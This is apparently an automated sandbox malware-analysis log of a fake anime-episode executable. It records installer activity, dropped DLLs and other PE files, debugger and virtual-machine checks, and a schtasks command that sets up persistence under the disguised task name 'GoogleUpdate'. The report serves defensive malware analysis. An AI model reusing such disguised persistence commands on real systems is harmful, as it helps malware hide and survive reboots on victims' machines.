Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1046\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1049\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1055\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\2052\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\3082\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1028\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1029\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1031\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1036\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1040\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1041\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1042\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1045\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1046\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1049\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1055\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\2052\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\3082\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1028\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1029\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1031\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1036\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1040\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1041\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1042\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1045\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1046\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1049\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1055\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\2052\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\3082\license.rtf

Boot Survival

Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd71e.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd70e.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd71b.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd708.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd718.rbf (copy)
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\_isetup\_setup64.tmp
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd722.rbf (copy)
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QUMRA.tmp\_isetup\_setup64.tmp
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd724.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd71f.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd70a.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd71a.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd70f.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd70b.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd717.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\System32\msvcp140_codecvt_ids.dll
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd723.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd707.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd710.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd71c.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd720.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\System32\msvcp140_atomic_wait.dll
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd71d.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd70d.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd721.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd709.rbf (copy)
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd719.rbf (copy)
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0004FDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0004FE5Dh4_2_0004FDC2
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0004FDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0004FE56h4_2_0004FDC2
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000EFDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 000EFE5Dh5_2_000EFDC2
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000EFDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 000EFE56h5_2_000EFDC2
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeRegistry key enumerated: More than 302 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeRegistry key enumerated: More than 452 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0005962D VirtualQuery,GetSystemInfo,4_2_0005962D
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00013BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,4_2_00013BC3
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00054315 FindFirstFileW,FindClose,4_2_00054315
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0002993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,4_2_0002993E
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00047A87 FindFirstFileExW,4_2_00047A87
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000F4315 FindFirstFileW,FindClose,5_2_000F4315
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000C993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,5_2_000C993E
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000B3BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,5_2_000B3BC3
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000E7A87 FindFirstFileExW,5_2_000E7A87
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\NULL
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\NULL
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\NULL
Source: VC_redist.x64.exe, 0000001C.00000003.364382485.0000000001568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: VC_redist.x64.exe, 0000001C.00000003.364382485.0000000001568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003E625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0003E625
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_000138D4 GetProcessHeap,RtlAllocateHeap,4_2_000138D4
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00044812 mov eax, dword ptr fs:[00000030h]4_2_00044812
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000E4812 mov eax, dword ptr fs:[00000030h]5_2_000E4812
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003E773 SetUnhandledExceptionFilter,4_2_0003E773
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003E188 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0003E188
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003E625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0003E625
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00043BB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00043BB0
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000DE773 SetUnhandledExceptionFilter,5_2_000DE773
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000DE188 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000DE188
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000DE625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000DE625
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000E3BB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000E3BB0
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "c:\programdata\package cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\vc_redist.x64.exe" -burn.clean.room="c:\programdata\package cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\vc_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=564 /quiet /burn.log.append "c:\users\user\appdata\local\temp\dd_vcredist_amd64_20230102153454.log" /install
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded burnpipe.{652d427c-3fcf-4f57-9b0a-0ffbca2578fc} {cf7111b3-ff83-47bf-a56d-0e99b89a84c1} 5468
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -burn.clean.room="c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded burnpipe.{652d427c-3fcf-4f57-9b0a-0ffbca2578fc} {cf7111b3-ff83-47bf-a56d-0e99b89a84c1} 5468
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded burnpipe.{8ade75be-8c64-4d11-b05a-a6c78aecd63f} {6ee058d7-d097-43e8-87f0-a357d97d5238} 1324
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -burn.clean.room="c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded burnpipe.{8ade75be-8c64-4d11-b05a-a6c78aecd63f} {6ee058d7-d097-43e8-87f0-a357d97d5238} 1324
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe "C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeProcess created: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe "C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=628 /install /quiet
